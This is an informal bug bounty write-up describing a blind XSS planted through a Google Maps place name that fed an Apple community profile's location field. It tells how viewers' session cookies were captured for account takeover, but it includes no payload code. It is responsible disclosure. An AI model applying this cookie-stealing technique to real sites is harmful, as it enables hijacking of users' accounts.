How I got a Bug At Apple that lead’s to takeover accounts of any user who view my profile

3 min readDec 29, 2022


Hi Team Iam Abdelkader Mouaz my pseudo is Hamzadzworm today i will share with you a Bug That Lead To Takeover account of any user just if he view my profile

I Was Hunting On Apple For Few Days, I Try to Do Subdomain Enumeration Using Multipe Tools To Get All possible Subdomains I Was Able To get About 20K Live Subdomain it Was A Big list but I had A lot Of time I keeped Testing Them One By One

I found an interesting One It Was A community Subdomain That You Can Log in into It With Your I Cloud Account so i was thinking That If I get An Account Takeover There I Will Be Able To Takeover Icloud Accounts

i keep searching For Few Days Untile I got An Interesting Endpoint It Was Location One where Iam Able To put Location On My Profile But I Couldn’t Do That Manually

Location Adresss eWere Added Automatically By Putting Adresse And it was picking this Automatique Locations From Apple Maps thats an exemple For It

it was redirecting me to google maps with an input Test/Test

it was an interesting thing so i go to add a new map thats non listed in google map then share it using the endpoint i found:

after i was able to add the map i put a blind xss payload in google place name then sent it and it was accepted it wasnt executed in google for sure

but after i link it with becasue apple maps taking map from google map i was able to make a finall payload and add it in my profile location and

it Was At (Lieu) which mean Location As You See in the Screen Bellow

And Yey Its Executed

Then I Added A Blind Xss Payload At Map And Opened New Account And Try To View My Profile That Contain Blind Xss And Its Fired And I got cookies Of Account At My Xss Hunter Account Which Allowed Me To Takeover The Account

I Hope You Enjoyed The Write Up Let A Comment For Me If you Liked it -.- :)